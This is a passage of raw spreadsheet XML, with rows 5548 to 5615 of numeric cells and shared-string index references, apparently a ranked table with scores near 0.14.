      <c r="A5548" s="1">
        <v>20948.0</v>
      </c>
      <c r="B5548" s="2">
        <v>1.6612949E7</v>
      </c>
      <c r="C5548" s="2" t="s">
        <v>5292</v>
      </c>
      <c r="D5548" s="2">
        <v>1.0</v>
      </c>
      <c r="E5548" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5548" s="2">
        <v>0.1467013888888889</v>
      </c>
    </row>
    <row r="5549" ht="15.75" customHeight="1">
      <c r="A5549" s="1">
        <v>22328.0</v>
      </c>
      <c r="B5549" s="2">
        <v>3.4133406E7</v>
      </c>
      <c r="C5549" s="2" t="s">
        <v>5293</v>
      </c>
      <c r="D5549" s="2">
        <v>1.0</v>
      </c>
      <c r="E5549" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5549" s="2">
        <v>0.1464646464646465</v>
      </c>
    </row>
    <row r="5550" ht="15.75" customHeight="1">
      <c r="A5550" s="1">
        <v>22408.0</v>
      </c>
      <c r="B5550" s="2">
        <v>3.5770742E7</v>
      </c>
      <c r="C5550" s="2" t="s">
        <v>5294</v>
      </c>
      <c r="D5550" s="2">
        <v>1.0</v>
      </c>
      <c r="E5550" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5550" s="2">
        <v>0.1464646464646465</v>
      </c>
    </row>
    <row r="5551" ht="15.75" customHeight="1">
      <c r="A5551" s="1">
        <v>30928.0</v>
      </c>
      <c r="B5551" s="2">
        <v>4.7031062E7</v>
      </c>
      <c r="C5551" s="2" t="s">
        <v>5295</v>
      </c>
      <c r="D5551" s="2">
        <v>1.0</v>
      </c>
      <c r="E5551" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5551" s="2">
        <v>0.1464646464646465</v>
      </c>
    </row>
    <row r="5552" ht="15.75" customHeight="1">
      <c r="A5552" s="1">
        <v>27299.0</v>
      </c>
      <c r="B5552" s="2">
        <v>2.1306947E7</v>
      </c>
      <c r="C5552" s="2" t="s">
        <v>5296</v>
      </c>
      <c r="D5552" s="2">
        <v>1.0</v>
      </c>
      <c r="E5552" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5552" s="2">
        <v>0.146057347670251</v>
      </c>
    </row>
    <row r="5553" ht="15.75" customHeight="1">
      <c r="A5553" s="1">
        <v>33288.0</v>
      </c>
      <c r="B5553" s="2">
        <v>7455918.0</v>
      </c>
      <c r="C5553" s="2" t="s">
        <v>5297</v>
      </c>
      <c r="D5553" s="2">
        <v>1.0</v>
      </c>
      <c r="E5553" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5553" s="2">
        <v>0.146057347670251</v>
      </c>
    </row>
    <row r="5554" ht="15.75" customHeight="1">
      <c r="A5554" s="1">
        <v>22329.0</v>
      </c>
      <c r="B5554" s="2">
        <v>3.4170846E7</v>
      </c>
      <c r="C5554" s="2" t="s">
        <v>5242</v>
      </c>
      <c r="D5554" s="2">
        <v>1.0</v>
      </c>
      <c r="E5554" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5554" s="2">
        <v>0.1460573476702509</v>
      </c>
    </row>
    <row r="5555" ht="15.75" customHeight="1">
      <c r="A5555" s="1">
        <v>30416.0</v>
      </c>
      <c r="B5555" s="2">
        <v>3.8815054E7</v>
      </c>
      <c r="C5555" s="2" t="s">
        <v>5298</v>
      </c>
      <c r="D5555" s="2">
        <v>1.0</v>
      </c>
      <c r="E5555" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5555" s="2">
        <v>0.1460573476702509</v>
      </c>
    </row>
    <row r="5556" ht="15.75" customHeight="1">
      <c r="A5556" s="1">
        <v>28934.0</v>
      </c>
      <c r="B5556" s="2">
        <v>2.9610407E7</v>
      </c>
      <c r="C5556" s="2" t="s">
        <v>5299</v>
      </c>
      <c r="D5556" s="2">
        <v>1.0</v>
      </c>
      <c r="E5556" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5556" s="2">
        <v>0.1459510357815443</v>
      </c>
    </row>
    <row r="5557" ht="15.75" customHeight="1">
      <c r="A5557" s="1">
        <v>31897.0</v>
      </c>
      <c r="B5557" s="2">
        <v>5293780.0</v>
      </c>
      <c r="C5557" s="2" t="s">
        <v>5300</v>
      </c>
      <c r="D5557" s="2">
        <v>1.0</v>
      </c>
      <c r="E5557" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5557" s="2">
        <v>0.1459510357815443</v>
      </c>
    </row>
    <row r="5558" ht="15.75" customHeight="1">
      <c r="A5558" s="1">
        <v>5873.0</v>
      </c>
      <c r="B5558" s="2">
        <v>4.7029909E7</v>
      </c>
      <c r="C5558" s="2" t="s">
        <v>5301</v>
      </c>
      <c r="D5558" s="2">
        <v>1.0</v>
      </c>
      <c r="E5558" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5558" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="5559" ht="15.75" customHeight="1">
      <c r="A5559" s="1">
        <v>6318.0</v>
      </c>
      <c r="B5559" s="2">
        <v>4.8255026E7</v>
      </c>
      <c r="C5559" s="2" t="s">
        <v>5302</v>
      </c>
      <c r="D5559" s="2">
        <v>1.0</v>
      </c>
      <c r="E5559" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5559" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="5560" ht="15.75" customHeight="1">
      <c r="A5560" s="1">
        <v>20708.0</v>
      </c>
      <c r="B5560" s="2">
        <v>1.4562525E7</v>
      </c>
      <c r="C5560" s="2" t="s">
        <v>5303</v>
      </c>
      <c r="D5560" s="2">
        <v>1.0</v>
      </c>
      <c r="E5560" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5560" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="5561" ht="15.75" customHeight="1">
      <c r="A5561" s="1">
        <v>20900.0</v>
      </c>
      <c r="B5561" s="2">
        <v>1.6252775E7</v>
      </c>
      <c r="C5561" s="2" t="s">
        <v>5304</v>
      </c>
      <c r="D5561" s="2">
        <v>1.0</v>
      </c>
      <c r="E5561" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5561" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="5562" ht="15.75" customHeight="1">
      <c r="A5562" s="1">
        <v>21094.0</v>
      </c>
      <c r="B5562" s="2">
        <v>1.8074483E7</v>
      </c>
      <c r="C5562" s="2" t="s">
        <v>5305</v>
      </c>
      <c r="D5562" s="2">
        <v>1.0</v>
      </c>
      <c r="E5562" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5562" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="5563" ht="15.75" customHeight="1">
      <c r="A5563" s="1">
        <v>21355.0</v>
      </c>
      <c r="B5563" s="2">
        <v>2.1359978E7</v>
      </c>
      <c r="C5563" s="2" t="s">
        <v>5306</v>
      </c>
      <c r="D5563" s="2">
        <v>1.0</v>
      </c>
      <c r="E5563" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5563" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="5564" ht="15.75" customHeight="1">
      <c r="A5564" s="1">
        <v>21891.0</v>
      </c>
      <c r="B5564" s="2">
        <v>2.7803527E7</v>
      </c>
      <c r="C5564" s="2" t="s">
        <v>5307</v>
      </c>
      <c r="D5564" s="2">
        <v>1.0</v>
      </c>
      <c r="E5564" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5564" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="5565" ht="15.75" customHeight="1">
      <c r="A5565" s="1">
        <v>22128.0</v>
      </c>
      <c r="B5565" s="2">
        <v>3.1020657E7</v>
      </c>
      <c r="C5565" s="2" t="s">
        <v>5308</v>
      </c>
      <c r="D5565" s="2">
        <v>1.0</v>
      </c>
      <c r="E5565" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5565" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="5566" ht="15.75" customHeight="1">
      <c r="A5566" s="1">
        <v>22336.0</v>
      </c>
      <c r="B5566" s="2">
        <v>3.4392081E7</v>
      </c>
      <c r="C5566" s="2" t="s">
        <v>5309</v>
      </c>
      <c r="D5566" s="2">
        <v>1.0</v>
      </c>
      <c r="E5566" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5566" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="5567" ht="15.75" customHeight="1">
      <c r="A5567" s="1">
        <v>23856.0</v>
      </c>
      <c r="B5567" s="2">
        <v>8251404.0</v>
      </c>
      <c r="C5567" s="2" t="s">
        <v>5310</v>
      </c>
      <c r="D5567" s="2">
        <v>1.0</v>
      </c>
      <c r="E5567" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5567" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="5568" ht="15.75" customHeight="1">
      <c r="A5568" s="1">
        <v>24355.0</v>
      </c>
      <c r="B5568" s="2">
        <v>1.0730966E7</v>
      </c>
      <c r="C5568" s="2" t="s">
        <v>5311</v>
      </c>
      <c r="D5568" s="2">
        <v>1.0</v>
      </c>
      <c r="E5568" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5568" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="5569" ht="15.75" customHeight="1">
      <c r="A5569" s="1">
        <v>26840.0</v>
      </c>
      <c r="B5569" s="2">
        <v>1.8921936E7</v>
      </c>
      <c r="C5569" s="2" t="s">
        <v>5312</v>
      </c>
      <c r="D5569" s="2">
        <v>1.0</v>
      </c>
      <c r="E5569" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5569" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="5570" ht="15.75" customHeight="1">
      <c r="A5570" s="1">
        <v>28709.0</v>
      </c>
      <c r="B5570" s="2">
        <v>2.7803526E7</v>
      </c>
      <c r="C5570" s="2" t="s">
        <v>5307</v>
      </c>
      <c r="D5570" s="2">
        <v>1.0</v>
      </c>
      <c r="E5570" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5570" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="5571" ht="15.75" customHeight="1">
      <c r="A5571" s="1">
        <v>31069.0</v>
      </c>
      <c r="B5571" s="2">
        <v>4.8167195E7</v>
      </c>
      <c r="C5571" s="2" t="s">
        <v>5313</v>
      </c>
      <c r="D5571" s="2">
        <v>1.0</v>
      </c>
      <c r="E5571" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5571" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="5572" ht="15.75" customHeight="1">
      <c r="A5572" s="1">
        <v>31470.0</v>
      </c>
      <c r="B5572" s="2">
        <v>5046390.0</v>
      </c>
      <c r="C5572" s="2" t="s">
        <v>5314</v>
      </c>
      <c r="D5572" s="2">
        <v>1.0</v>
      </c>
      <c r="E5572" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5572" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="5573" ht="15.75" customHeight="1">
      <c r="A5573" s="1">
        <v>32233.0</v>
      </c>
      <c r="B5573" s="2">
        <v>5.4972229E7</v>
      </c>
      <c r="C5573" s="2" t="s">
        <v>5315</v>
      </c>
      <c r="D5573" s="2">
        <v>1.0</v>
      </c>
      <c r="E5573" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5573" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="5574" ht="15.75" customHeight="1">
      <c r="A5574" s="1">
        <v>30363.0</v>
      </c>
      <c r="B5574" s="2">
        <v>3.8362438E7</v>
      </c>
      <c r="C5574" s="2" t="s">
        <v>5316</v>
      </c>
      <c r="D5574" s="2">
        <v>1.0</v>
      </c>
      <c r="E5574" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5574" s="2">
        <v>0.1455696202531646</v>
      </c>
    </row>
    <row r="5575" ht="15.75" customHeight="1">
      <c r="A5575" s="1">
        <v>19486.0</v>
      </c>
      <c r="B5575" s="2">
        <v>5.5857934E7</v>
      </c>
      <c r="C5575" s="2" t="s">
        <v>5317</v>
      </c>
      <c r="D5575" s="2">
        <v>1.0</v>
      </c>
      <c r="E5575" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5575" s="2">
        <v>0.1455026455026456</v>
      </c>
    </row>
    <row r="5576" ht="15.75" customHeight="1">
      <c r="A5576" s="1">
        <v>20316.0</v>
      </c>
      <c r="B5576" s="2">
        <v>1.1422125E7</v>
      </c>
      <c r="C5576" s="2" t="s">
        <v>5318</v>
      </c>
      <c r="D5576" s="2">
        <v>1.0</v>
      </c>
      <c r="E5576" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5576" s="2">
        <v>0.1455026455026456</v>
      </c>
    </row>
    <row r="5577" ht="15.75" customHeight="1">
      <c r="A5577" s="1">
        <v>31405.0</v>
      </c>
      <c r="B5577" s="2">
        <v>5004430.0</v>
      </c>
      <c r="C5577" s="2" t="s">
        <v>5319</v>
      </c>
      <c r="D5577" s="2">
        <v>1.0</v>
      </c>
      <c r="E5577" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5577" s="2">
        <v>0.1455026455026456</v>
      </c>
    </row>
    <row r="5578" ht="15.75" customHeight="1">
      <c r="A5578" s="1">
        <v>31996.0</v>
      </c>
      <c r="B5578" s="2">
        <v>5332654.0</v>
      </c>
      <c r="C5578" s="2" t="s">
        <v>5320</v>
      </c>
      <c r="D5578" s="2">
        <v>1.0</v>
      </c>
      <c r="E5578" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5578" s="2">
        <v>0.1455026455026456</v>
      </c>
    </row>
    <row r="5579" ht="15.75" customHeight="1">
      <c r="A5579" s="1">
        <v>33759.0</v>
      </c>
      <c r="B5579" s="2">
        <v>8610490.0</v>
      </c>
      <c r="C5579" s="2" t="s">
        <v>5321</v>
      </c>
      <c r="D5579" s="2">
        <v>1.0</v>
      </c>
      <c r="E5579" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5579" s="2">
        <v>0.1455026455026456</v>
      </c>
    </row>
    <row r="5580" ht="15.75" customHeight="1">
      <c r="A5580" s="1">
        <v>28801.0</v>
      </c>
      <c r="B5580" s="2">
        <v>2.865456E7</v>
      </c>
      <c r="C5580" s="2" t="s">
        <v>5322</v>
      </c>
      <c r="D5580" s="2">
        <v>1.0</v>
      </c>
      <c r="E5580" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5580" s="2">
        <v>0.1453703703703704</v>
      </c>
    </row>
    <row r="5581" ht="15.75" customHeight="1">
      <c r="A5581" s="1">
        <v>33251.0</v>
      </c>
      <c r="B5581" s="2">
        <v>7359780.0</v>
      </c>
      <c r="C5581" s="2" t="s">
        <v>5323</v>
      </c>
      <c r="D5581" s="2">
        <v>1.0</v>
      </c>
      <c r="E5581" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5581" s="2">
        <v>0.1453576864535769</v>
      </c>
    </row>
    <row r="5582" ht="15.75" customHeight="1">
      <c r="A5582" s="1">
        <v>32728.0</v>
      </c>
      <c r="B5582" s="2">
        <v>6004774.0</v>
      </c>
      <c r="C5582" s="2" t="s">
        <v>5324</v>
      </c>
      <c r="D5582" s="2">
        <v>1.0</v>
      </c>
      <c r="E5582" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5582" s="2">
        <v>0.1452380952380953</v>
      </c>
    </row>
    <row r="5583" ht="15.75" customHeight="1">
      <c r="A5583" s="1">
        <v>22221.0</v>
      </c>
      <c r="B5583" s="2">
        <v>3.2289589E7</v>
      </c>
      <c r="C5583" s="2" t="s">
        <v>5325</v>
      </c>
      <c r="D5583" s="2">
        <v>1.0</v>
      </c>
      <c r="E5583" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5583" s="2">
        <v>0.1452241715399611</v>
      </c>
    </row>
    <row r="5584" ht="15.75" customHeight="1">
      <c r="A5584" s="1">
        <v>23519.0</v>
      </c>
      <c r="B5584" s="2">
        <v>5848395.0</v>
      </c>
      <c r="C5584" s="2" t="s">
        <v>5326</v>
      </c>
      <c r="D5584" s="2">
        <v>1.0</v>
      </c>
      <c r="E5584" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5584" s="2">
        <v>0.1452241715399611</v>
      </c>
    </row>
    <row r="5585" ht="15.75" customHeight="1">
      <c r="A5585" s="1">
        <v>32975.0</v>
      </c>
      <c r="B5585" s="2">
        <v>6561522.0</v>
      </c>
      <c r="C5585" s="2" t="s">
        <v>5327</v>
      </c>
      <c r="D5585" s="2">
        <v>1.0</v>
      </c>
      <c r="E5585" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5585" s="2">
        <v>0.1452241715399611</v>
      </c>
    </row>
    <row r="5586" ht="15.75" customHeight="1">
      <c r="A5586" s="1">
        <v>31150.0</v>
      </c>
      <c r="B5586" s="2">
        <v>4890331.0</v>
      </c>
      <c r="C5586" s="2" t="s">
        <v>5328</v>
      </c>
      <c r="D5586" s="2">
        <v>1.0</v>
      </c>
      <c r="E5586" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5586" s="2">
        <v>0.1451077943615258</v>
      </c>
    </row>
    <row r="5587" ht="15.75" customHeight="1">
      <c r="A5587" s="1">
        <v>33218.0</v>
      </c>
      <c r="B5587" s="2">
        <v>7236749.0</v>
      </c>
      <c r="C5587" s="2" t="s">
        <v>5329</v>
      </c>
      <c r="D5587" s="2">
        <v>1.0</v>
      </c>
      <c r="E5587" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5587" s="2">
        <v>0.1450617283950617</v>
      </c>
    </row>
    <row r="5588" ht="15.75" customHeight="1">
      <c r="A5588" s="1">
        <v>26699.0</v>
      </c>
      <c r="B5588" s="2">
        <v>1.8140556E7</v>
      </c>
      <c r="C5588" s="2" t="s">
        <v>5330</v>
      </c>
      <c r="D5588" s="2">
        <v>1.0</v>
      </c>
      <c r="E5588" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5588" s="2">
        <v>0.144808743169399</v>
      </c>
    </row>
    <row r="5589" ht="15.75" customHeight="1">
      <c r="A5589" s="1">
        <v>24509.0</v>
      </c>
      <c r="B5589" s="2">
        <v>1.1134055E7</v>
      </c>
      <c r="C5589" s="2" t="s">
        <v>5331</v>
      </c>
      <c r="D5589" s="2">
        <v>1.0</v>
      </c>
      <c r="E5589" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5589" s="2">
        <v>0.1447574334898279</v>
      </c>
    </row>
    <row r="5590" ht="15.75" customHeight="1">
      <c r="A5590" s="1">
        <v>24543.0</v>
      </c>
      <c r="B5590" s="2">
        <v>1.1222199E7</v>
      </c>
      <c r="C5590" s="2" t="s">
        <v>5332</v>
      </c>
      <c r="D5590" s="2">
        <v>1.0</v>
      </c>
      <c r="E5590" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5590" s="2">
        <v>0.1446360153256705</v>
      </c>
    </row>
    <row r="5591" ht="15.75" customHeight="1">
      <c r="A5591" s="1">
        <v>24504.0</v>
      </c>
      <c r="B5591" s="2">
        <v>1.1107069E7</v>
      </c>
      <c r="C5591" s="2" t="s">
        <v>5333</v>
      </c>
      <c r="D5591" s="2">
        <v>1.0</v>
      </c>
      <c r="E5591" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5591" s="2">
        <v>0.1446078431372549</v>
      </c>
    </row>
    <row r="5592" ht="15.75" customHeight="1">
      <c r="A5592" s="1">
        <v>24681.0</v>
      </c>
      <c r="B5592" s="2">
        <v>1.1601767E7</v>
      </c>
      <c r="C5592" s="2" t="s">
        <v>5334</v>
      </c>
      <c r="D5592" s="2">
        <v>1.0</v>
      </c>
      <c r="E5592" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5592" s="2">
        <v>0.1444444444444445</v>
      </c>
    </row>
    <row r="5593" ht="15.75" customHeight="1">
      <c r="A5593" s="1">
        <v>30830.0</v>
      </c>
      <c r="B5593" s="2">
        <v>4543140.0</v>
      </c>
      <c r="C5593" s="2" t="s">
        <v>5335</v>
      </c>
      <c r="D5593" s="2">
        <v>1.0</v>
      </c>
      <c r="E5593" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5593" s="2">
        <v>0.1442901234567902</v>
      </c>
    </row>
    <row r="5594" ht="15.75" customHeight="1">
      <c r="A5594" s="1">
        <v>28838.0</v>
      </c>
      <c r="B5594" s="2">
        <v>2.8916609E7</v>
      </c>
      <c r="C5594" s="2" t="s">
        <v>5336</v>
      </c>
      <c r="D5594" s="2">
        <v>1.0</v>
      </c>
      <c r="E5594" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5594" s="2">
        <v>0.1442652329749105</v>
      </c>
    </row>
    <row r="5595" ht="15.75" customHeight="1">
      <c r="A5595" s="1">
        <v>31813.0</v>
      </c>
      <c r="B5595" s="2">
        <v>5251881.0</v>
      </c>
      <c r="C5595" s="2" t="s">
        <v>5337</v>
      </c>
      <c r="D5595" s="2">
        <v>1.0</v>
      </c>
      <c r="E5595" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5595" s="2">
        <v>0.1440677966101696</v>
      </c>
    </row>
    <row r="5596" ht="15.75" customHeight="1">
      <c r="A5596" s="1">
        <v>28171.0</v>
      </c>
      <c r="B5596" s="2">
        <v>2.495485E7</v>
      </c>
      <c r="C5596" s="2" t="s">
        <v>5338</v>
      </c>
      <c r="D5596" s="2">
        <v>1.0</v>
      </c>
      <c r="E5596" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5596" s="2">
        <v>0.1440677966101695</v>
      </c>
    </row>
    <row r="5597" ht="15.75" customHeight="1">
      <c r="A5597" s="1">
        <v>28994.0</v>
      </c>
      <c r="B5597" s="2">
        <v>2.9863736E7</v>
      </c>
      <c r="C5597" s="2" t="s">
        <v>5339</v>
      </c>
      <c r="D5597" s="2">
        <v>1.0</v>
      </c>
      <c r="E5597" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5597" s="2">
        <v>0.1440677966101695</v>
      </c>
    </row>
    <row r="5598" ht="15.75" customHeight="1">
      <c r="A5598" s="1">
        <v>26740.0</v>
      </c>
      <c r="B5598" s="2">
        <v>1.8285382E7</v>
      </c>
      <c r="C5598" s="2" t="s">
        <v>5340</v>
      </c>
      <c r="D5598" s="2">
        <v>1.0</v>
      </c>
      <c r="E5598" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5598" s="2">
        <v>0.1440058479532164</v>
      </c>
    </row>
    <row r="5599" ht="15.75" customHeight="1">
      <c r="A5599" s="1">
        <v>31814.0</v>
      </c>
      <c r="B5599" s="2">
        <v>5.2519171E7</v>
      </c>
      <c r="C5599" s="2" t="s">
        <v>5341</v>
      </c>
      <c r="D5599" s="2">
        <v>1.0</v>
      </c>
      <c r="E5599" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5599" s="2">
        <v>0.143939393939394</v>
      </c>
    </row>
    <row r="5600" ht="15.75" customHeight="1">
      <c r="A5600" s="1">
        <v>20662.0</v>
      </c>
      <c r="B5600" s="2">
        <v>1.4332276E7</v>
      </c>
      <c r="C5600" s="2" t="s">
        <v>5342</v>
      </c>
      <c r="D5600" s="2">
        <v>1.0</v>
      </c>
      <c r="E5600" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5600" s="2">
        <v>0.1438492063492064</v>
      </c>
    </row>
    <row r="5601" ht="15.75" customHeight="1">
      <c r="A5601" s="1">
        <v>29002.0</v>
      </c>
      <c r="B5601" s="2">
        <v>2.9876117E7</v>
      </c>
      <c r="C5601" s="2" t="s">
        <v>5343</v>
      </c>
      <c r="D5601" s="2">
        <v>1.0</v>
      </c>
      <c r="E5601" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5601" s="2">
        <v>0.1438492063492064</v>
      </c>
    </row>
    <row r="5602" ht="15.75" customHeight="1">
      <c r="A5602" s="1">
        <v>29714.0</v>
      </c>
      <c r="B5602" s="2">
        <v>3.439208E7</v>
      </c>
      <c r="C5602" s="2" t="s">
        <v>5309</v>
      </c>
      <c r="D5602" s="2">
        <v>1.0</v>
      </c>
      <c r="E5602" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5602" s="2">
        <v>0.1438492063492064</v>
      </c>
    </row>
    <row r="5603" ht="15.75" customHeight="1">
      <c r="A5603" s="1">
        <v>29977.0</v>
      </c>
      <c r="B5603" s="2">
        <v>3.6098153E7</v>
      </c>
      <c r="C5603" s="2" t="s">
        <v>5344</v>
      </c>
      <c r="D5603" s="2">
        <v>1.0</v>
      </c>
      <c r="E5603" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5603" s="2">
        <v>0.1438492063492064</v>
      </c>
    </row>
    <row r="5604" ht="15.75" customHeight="1">
      <c r="A5604" s="1">
        <v>33030.0</v>
      </c>
      <c r="B5604" s="2">
        <v>6692579.0</v>
      </c>
      <c r="C5604" s="2" t="s">
        <v>5345</v>
      </c>
      <c r="D5604" s="2">
        <v>1.0</v>
      </c>
      <c r="E5604" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5604" s="2">
        <v>0.1438492063492064</v>
      </c>
    </row>
    <row r="5605" ht="15.75" customHeight="1">
      <c r="A5605" s="1">
        <v>24411.0</v>
      </c>
      <c r="B5605" s="2">
        <v>1.0824356E7</v>
      </c>
      <c r="C5605" s="2" t="s">
        <v>5346</v>
      </c>
      <c r="D5605" s="2">
        <v>1.0</v>
      </c>
      <c r="E5605" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5605" s="2">
        <v>0.1437389770723105</v>
      </c>
    </row>
    <row r="5606" ht="15.75" customHeight="1">
      <c r="A5606" s="1">
        <v>25460.0</v>
      </c>
      <c r="B5606" s="2">
        <v>1.3970038E7</v>
      </c>
      <c r="C5606" s="2" t="s">
        <v>5347</v>
      </c>
      <c r="D5606" s="2">
        <v>1.0</v>
      </c>
      <c r="E5606" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5606" s="2">
        <v>0.1437389770723105</v>
      </c>
    </row>
    <row r="5607" ht="15.75" customHeight="1">
      <c r="A5607" s="1">
        <v>31894.0</v>
      </c>
      <c r="B5607" s="2">
        <v>5290072.0</v>
      </c>
      <c r="C5607" s="2" t="s">
        <v>5348</v>
      </c>
      <c r="D5607" s="2">
        <v>1.0</v>
      </c>
      <c r="E5607" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5607" s="2">
        <v>0.1437389770723105</v>
      </c>
    </row>
    <row r="5608" ht="15.75" customHeight="1">
      <c r="A5608" s="1">
        <v>34091.0</v>
      </c>
      <c r="B5608" s="2">
        <v>9694132.0</v>
      </c>
      <c r="C5608" s="2" t="s">
        <v>5349</v>
      </c>
      <c r="D5608" s="2">
        <v>1.0</v>
      </c>
      <c r="E5608" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5608" s="2">
        <v>0.1437389770723105</v>
      </c>
    </row>
    <row r="5609" ht="15.75" customHeight="1">
      <c r="A5609" s="1">
        <v>31522.0</v>
      </c>
      <c r="B5609" s="2">
        <v>5083134.0</v>
      </c>
      <c r="C5609" s="2" t="s">
        <v>5350</v>
      </c>
      <c r="D5609" s="2">
        <v>1.0</v>
      </c>
      <c r="E5609" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5609" s="2">
        <v>0.1435786435786436</v>
      </c>
    </row>
    <row r="5610" ht="15.75" customHeight="1">
      <c r="A5610" s="1">
        <v>24232.0</v>
      </c>
      <c r="B5610" s="2">
        <v>1.0462108E7</v>
      </c>
      <c r="C5610" s="2" t="s">
        <v>5351</v>
      </c>
      <c r="D5610" s="2">
        <v>1.0</v>
      </c>
      <c r="E5610" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5610" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="5611" ht="15.75" customHeight="1">
      <c r="A5611" s="1">
        <v>26225.0</v>
      </c>
      <c r="B5611" s="2">
        <v>1.6279652E7</v>
      </c>
      <c r="C5611" s="2" t="s">
        <v>5352</v>
      </c>
      <c r="D5611" s="2">
        <v>1.0</v>
      </c>
      <c r="E5611" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5611" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="5612" ht="15.75" customHeight="1">
      <c r="A5612" s="1">
        <v>26286.0</v>
      </c>
      <c r="B5612" s="2">
        <v>1.6457007E7</v>
      </c>
      <c r="C5612" s="2" t="s">
        <v>5353</v>
      </c>
      <c r="D5612" s="2">
        <v>1.0</v>
      </c>
      <c r="E5612" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5612" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="5613" ht="15.75" customHeight="1">
      <c r="A5613" s="1">
        <v>26411.0</v>
      </c>
      <c r="B5613" s="2">
        <v>1.7099239E7</v>
      </c>
      <c r="C5613" s="2" t="s">
        <v>5354</v>
      </c>
      <c r="D5613" s="2">
        <v>1.0</v>
      </c>
      <c r="E5613" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5613" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="5614" ht="15.75" customHeight="1">
      <c r="A5614" s="1">
        <v>29094.0</v>
      </c>
      <c r="B5614" s="2">
        <v>3.0389828E7</v>
      </c>
      <c r="C5614" s="2" t="s">
        <v>5355</v>
      </c>
      <c r="D5614" s="2">
        <v>1.0</v>
      </c>
      <c r="E5614" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5614" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="5615" ht="15.75" customHeight="1">
      <c r="A5615" s="1">
        <v>30934.0</v>
      </c>
